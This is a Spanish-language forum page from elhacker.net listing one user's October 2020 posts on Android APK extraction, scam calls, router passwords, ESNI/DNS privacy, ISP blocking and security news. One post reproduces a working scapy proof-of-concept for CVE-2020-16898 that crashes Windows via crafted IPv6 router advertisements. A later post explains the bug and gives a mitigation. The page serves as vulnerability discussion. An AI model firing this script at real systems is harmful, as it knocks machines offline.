elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.


 


Tema destacado: Security Series.XSS. [Cross Site Scripting]


  Mostrar Mensajes
Páginas: 1 2 3 [4] 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 ... 428
31  Programación / Ingeniería Inversa / Re: Buscando malware o software espia en una app de Android en: 21 Octubre 2020, 12:35
Cómo extraer el APK de cualquier aplicación en Android

Cómo podemos extraer ese fichero APK de cualquier aplicación que tengamos instalada en el móvil.

Android utiliza 3 tipos de arquitecturas básicas en sus procesadores: ARM, ARM64 y X86.

Cómo conseguir el APK de las aplicaciones que tenemos instaladas en el móvil

Para sacar el APK de cualquiera de las aplicaciones que tenemos instaladas en un Android no necesitamos demasiadas complicaciones. Existen lo que se conoce como extractores de APKs, aplicaciones que hacen justamente lo que indica su nombre. Una de las mejores se llama APK Extractor. Es gratuita y la podemos descargar directamente desde Google Play.

APK Extractor
https://play.google.com/store/apps/details?id=com.ext.ui
Developer: meher
Price: Free

Para extraer el APK de cualquier aplicación de sistema o app que hayamos descargado en el teléfono, seguiremos los siguientes pasos.

    Abrimos APK Extractor Pro.
    Veremos un listado de todas las aplicaciones y servicios instalados en nuestro dispositivo Android. Desde aquí buscaremos la aplicación que queremos convertir en APK.
    Una vez hemos localizado la app, pulsamos sobre ella.
    En este punto, si es la primera vez que utilizamos APK Extractor el sistema nos pedirá permisos de almacenamiento. Le otorgamos los permisos.
    Automáticamente la aplicación comenzará el trabajo de extracción. Dura apenas unos segundos.
    Podemos comprobar que el APK ha sido descargado desplazándonos hasta la carpeta «ExtractedApks» dentro de la memoria interna del teléfono. Podemos ir a esta carpeta utilizando un explorador de archivos o conectando el móvil a un PC.

Cómo extraer APKs directamente desde Google Play

Otra opción muy cómoda para conseguir el APK de una aplicación es descargándola directamente desde Google Play. Para ello, solo necesitamos acceder a esta herramienta online e introducir la URL en Google Play de la app que queremos descargar.

https://apps.evozi.com/apk-downloader/

Fuente:
https://elandroidefeliz.com/extraer-apk-de-cualquier-aplicacion-instalada-en-android/
32  Foros Generales / Noticias / Re: Microsoft: la empresa más suplantada por los ciberdelincuentes en: 21 Octubre 2020, 11:51
Cierto, debe ser la empresa más suplantada.

Incluso se hacen pasar por ellos con llamadas de Teléfono, es el colmo ya, encima hay gente que se lo cree o tiene dudas si les ha llamado Microsoft a su casa...

Falso soporte técnico de Microsoft - "Su ordenador está bloqueado - Llame al número gratuito 900"
https://blog.elhacker.net/2019/04/falso-soporte-tecnico-de-microsoft-su-ordenador-esta-bloqueado-llame-numero-900-gratuito.html
33  Seguridad Informática / Hacking Wireless / Re: ¿Cómo acceder a mi router sin contraseña? en: 21 Octubre 2020, 10:29
Citar
Pero como comparto el router con mis vecinos, ellos aveces cambian la clave varias veces sin avisar y me quedo sin internet, entonces me gustaria configurar el router para que no tenga que volver a ingresar la clave cada vez.

Los vecinos no debería poder cambiar la contraseña del Wifi.

Lo único que tienes que hacer es cambiar la contraseña por defecto del panel de configuración administración para impedir que cualquier vecino cambie la clave del Wifi.

Ponéis una contraseña fija del Wifi y la contraseña del Wifi la guarda el propio sistema operativo para no tenerla de escribir cada vez.
34  Comunicaciones / Redes / Re: ¿Qué información obtiene una web de un equipo que accede a ella? en: 20 Octubre 2020, 18:40
Pues como bien te dices los datos se obtienen a través del "user agent" del navegador, que puede ser modificado a nuestro gusto, pero que por defecto indica todos los datos que te comentan los compañeros.

Por suerte el webRTC ya no funciona para descubrir la IP de la red local (ip interna). La MAC no hay ninguna manera vía javascript, HTML5, ni en Flash se podía hacer. Supongo que en Java sería posible. Ni idea xD

Si realmente te preocupa la privacidad, entonces debería preocuparte mucho más usar DNS privados y no del operador y usar ESNI en el navegador


Básicamente usar el combo perfecto:

Citar
Secure DNS
DNSSEC
TLS 1.3
Encrypted SNI

https://www.cloudflare.com/ssl/encrypted-sni/

Activar ESNI en Windows con Firefox (en Google Chrome no he sido capaz)
https://blog.elhacker.net/2020/08/china-esta-bloqueando-todo-el-trafico-web-https-tls-esni.html

Activar TLS 1.3, DoH, DoT y ESNI en Android, Windows 10 (soporte experimental)
https://blog.elhacker.net/2020/09/rusia-quiere-prohibir-el-uso-de-protocolos-seguros-https-tls-doh-dot-esni.html
35  Foros Generales / Noticias / Re: DDoS y extorsión: la rentabilidad de «tumbar» una web en: 19 Octubre 2020, 16:42
el mayor ataque DDoS del mundo lo recibió Google en 2017 y lo dicen ahora xD

Y además no les causó ningún impacto  ;-)

El ataque fue cuatro veces mayor que el de la botnet Mirai de 2016. Supera, inclusive, al sufrido por Amazon AWS a principios de año.

 2.54 Tbps, lo que lo convierte en el ataque DDoS más potente registrado hasta la fecha.

36  Seguridad Informática / Bugs y Exploits / Re: Ping de la muerte para Windows 10 en: 19 Octubre 2020, 16:24
Proof-of-Concept / BSOD exploit for CVE-2020-16898 - Windows TCP/IP Remote Code Execution Vulnerability

http://site.pi3.com.pl/exp/p_CVE-2020-16898.py


Código
  1. #!/usr/bin/env python3
  2. #
  3. # Proof-of-Concept / BSOD exploit for CVE-2020-16898 - Windows TCP/IP Remote Code Execution Vulnerability
  4. #
  5. # Author: Adam 'pi3' Zabrocki
  6. # http://pi3.com.pl
  7. #
  8.  
  9. from scapy.all import *
  10.  
  11. v6_dst = "fd12:db80:b052:0:7ca6:e06e:acc1:481b"
  12. v6_src = "fe80::24f5:a2ff:fe30:8890"
  13.  
  14. p_test_half = 'A'.encode()*8 + b"\x18\x30" + b"\xFF\x18"
  15. p_test = p_test_half + 'A'.encode()*4
  16.  
  17. c = ICMPv6NDOptEFA();
  18.  
  19. e = ICMPv6NDOptRDNSS()
  20. e.len = 21
  21. e.dns = [
  22. "AAAA:AAAA:AAAA:AAAA:FFFF:AAAA:AAAA:AAAA",
  23. "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
  24. "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
  25. "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
  26. "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
  27. "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
  28. "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
  29. "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
  30. "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
  31. "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA" ]
  32.  
  33. pkt = ICMPv6ND_RA() / ICMPv6NDOptRDNSS(len=8) / \
  34.      Raw(load='A'.encode()*16*2 + p_test_half + b"\x18\xa0"*6) / c / e / c / e / c / e / c / e / c / e / e / e / e / e / e / e
  35.  
  36. p_test_frag = IPv6(dst=v6_dst, src=v6_src, hlim=255)/ \
  37.              IPv6ExtHdrFragment()/pkt
  38.  
  39. l=fragment6(p_test_frag, 200)
  40.  
  41. for p in l:
  42.    send(p)
  43.  
  44.  
37  Seguridad Informática / Bugs y Exploits / Ping de la muerte para Windows 10 en: 15 Octubre 2020, 22:44
Estas vulnerabilidades, causadas por un error en el controlador TCP/IP de Windows, se remontan a la vulnerabilidad “Ping de la muerte” corregida en 2013. Hacen posible la denegación de servicio y la posible ejecución remota de código.

La vulnerabilidad en tcpip.sys, un error lógico en la forma en que el controlador analiza los mensajes ICMP, se puede activar de forma remota con un mensaje router advertisement IPv6 especialmente diseñado que contenga una opción de servidor DNS recursivo (RDNSS). La opción RDNSS normalmente contiene una lista de las direcciones IPv6 de uno o más servidores DNS recursivos.




Hay una falla lógica en tcpip.sys que puede explotarse creando un paquete de router advertisement que contenga más datos de los esperados, lo que da como resultado que el controlador coloque más bytes de datos en su pila de memoria de los previstos en el código del controlador, por lo que se produce un desbordamiento de búfer. En teoría, esto podría usarse tanto para denegación de servicio como para ataques de ejecución remota de código. Pero en la práctica, lograr la ejecución remota de código sería extremadamente difícil.

SophosLabs desarrolló su propia prueba de concepto para un ataque, basada en la información proporcionada por Microsoft. Aprovechando la vulnerabilidad para causar una “pantalla azul de la muerte” BSOD en el ordenador de la víctima. Los detalles de la POC no los publicamos por ahora para evitar la explotación por parte de ciberdelincuentes.

Una vez que entendimos el error, desarrollar una prueba de concepto de “Pantalla azul de la muerte” fue bastante sencillo. Pero llevarlo al nivel que Microsoft advirtió es posible (la ejecución remota de código) no es tan sencillo. Los estándares y prácticas de codificación modernas ralentizarían el esfuerzo por construir un exploit RCE genérico confiable, por dos razones.

Primero, TcpIp.sys se compila con bandera GS, que evita que un desbordamiento de pila típico controle directamente la dirección de retorno.



La cookie de pila, también conocida como canario de pila, es un valor aleatorio generado en el momento de la carga. Su valor es XOR con el puntero de pila, lo que hace que sea extremadamente difícil predecir de manera confiable, especialmente en una explotación remota completa.




Hay dos técnicas típicas que se utilizan para omitir los canarios de pila, ninguna de las cuales se aplica realmente en este caso:

    Usar otra vulnerabilidad de fuga de información (lectura arbitraria), que no ayudará mucho a explotar tcpdrv.sys, porque el valor canario es XOR con el puntero de pila.
    Sobrescritura de un controlador de manejo de excepciones estructurado (SEH), que sería útil solo si se ha establecido un registro de excepción estructurado, que no es el caso.

El segundo obstáculo para una explotación eficaz de la RCE es la aleatorización del diseño del espacio de direcciones del kernel (kASLR). Incluso si fuera posible, puede predecir de manera confiable el canario de la pila (bastante improbable) para regresar a un shell del sistema en modo de usuario que requeriría determinar correctamente (y nuevamente de forma remota) la dirección base del kernel de Windows.

Eso significa que incluso cuando la naturaleza exacta del error en tcpdrv.sys se haga más conocida, puede pasar algún tiempo antes de que alguien pueda explotarlo de una manera que inyecte código de manera confiable en el espacio del kernel de Windows. Aun así, la amenaza de denegación de servicio a voluntad con un paquete de fácil elaboración debería ser suficiente por sí sola para provocar un parcheo rápido, que es la única solución real para esta vulnerabilidad.

Otras mitigaciones a corto plazo para posibles ataques de denegación de servicio incluyen:

    Desactivar IPv6 si no se utiliza, o
    Obligar a Windows a descartar los paquetes de router advertisement usando el comando

Código:
netsh (netsh int ipv6 set int *INTERFACENUMBER* rabaseddnsconfig=disable).




Citar
In a proof-of-concept published on October 13, 2020, the SophosLabs Offensive Security team demonstrates one possible exploit against a bug in Windows computers that can remotely execute code simply by sending a specially crafted IP version 6 packet at a vulnerable computer. While this demo does not show remote code executing, it does show that the exploit path for the bug is functional (but has been mitigated by protections Microsoft introduced into Windows 10) and demonstrates that this PoCg is capable of causing a "blue screen of death" on Windows computers, which may create other problems. With additional work, it will be possible, eventually, to execute arbitrary code without crashing the PC in the process.

Fuentes:
https://news.sophos.com/es-es/2020/10/14/la-razon-principal-para-instalar-los-parches-de-microsoft-de-octubre-de-2020-ping-de-la-muerte-redux/

https://blog.elhacker.net/2020/10/actualizaciones-de-seguridad-productos.html
38  Foros Generales / Noticias / Así bloquean Movistar, Vodafone, Orange y MásMóvil el streaming IPTV en: 14 Octubre 2020, 20:43
Operadora   Sistema autónomo   Tipo de bloqueo
Movistar   3352   Inspección de paquetes con FortiGate
Vodafone   12430   Inspección de paquetes con Allot
Orange   12479   Bloqueo DNS resolviendo a 127.0.0.1
MásMóvil   15704   Inspección de paquetes
Yoigo   16299   Bloqueo DNS resolviendo a 192.168.1.254
Euskaltel   12338   Bloqueo DNS no resuelve

Las operadoras ejercen el bloqueo principalmente mediante dos sistemas. El primero y más sencillo es falseando la respuesta del servidor DNS, de forma que el usuario intenta acceder a una dirección IP que no tiene un servidor web escuchando, resultando en un error de navegación. Es el sistema utilizado por Orange, MásMóvil en la red móvil de Yoigo y Euskaltel.

El segundo método, mucho más efectivo, consiste en inspeccionar el tráfico del usuario analizando la conversación entre nuestro dispositivo y el servidor de destino para descubrir si estamos accediendo a una de las webs prohibidas. En ese caso se intercepta la comunicación enviándonos una respuesta falsa en forma de un HTML con un error. Es el sistema que utilizan Movistar, Vodafone y MásMóvil en su red fija. La inspección DPI es efectiva incluso cuando accedemos sobre HTTPS, al analizar el diálogo inicial en el que el navegador cliente manda en texto plano el nombre del dominio al que desea acceder.

Fuente:
https://bandaancha.eu/articulos/como-bloquean-webs-descarga-streaming-9760

En teoría cambiando las DNS de la operadora y utilizando ESNI en el navegador problema resuelto  ;-)



https://www.cloudflare.com/es-es/ssl/encrypted-sni/

Servidores DNS gratuitos y seguros, compatibles con DoH y DoT
https://blog.elhacker.net/2019/11/servidores-dns-gratuitos-y-seguros-compatibles-doh-dot-tls-https-firefox-chrome-android.html

Server Name Indication - SNI vs E-SNI
https://blog.elhacker.net/2020/08/china-esta-bloqueando-todo-el-trafico-web-https-tls-esni.html
39  Foros Generales / Dudas Generales / Re: duda sobre localizar un atacante en la red en: 14 Octubre 2020, 20:06
Con una orden judicial, comunicando la IP al ISP se pueden obtener el domicilio de la personal.

Si se conecta a la Wifi de un vecino (no es la primera vez, ni la última vez que eso ocurre) pues el cuerpo policial (guardia civil, policía) es el encargado de investigarlo, hasta dar con él. Y no es tan difícil.
40  Foros Generales / Foro Libre / Re: El creador del antivirus McAfee se ha vuelto loco en: 8 Octubre 2020, 19:25
6 octubre 2020

Detenido en  España (Barcelona) John McAfee, será extraditado por evasión de impuestos con criptomonedas

Se le investiga por los delitos de evasión de impuestos y de omisión internacional de presentación de declaración de impuestos

El Departamento de Justicia de los EE.UU ha informado que el emprendedor está acusado de evasión de impuestos y fraude fiscal por valor de 23,1 millones de dólares en criptomonedas entre los años 2014 y 2018.

https://www.justice.gov/opa/pr/john-mcafee-indicted-tax-evasion
Páginas: 1 2 3 [4] 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 ... 428
Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines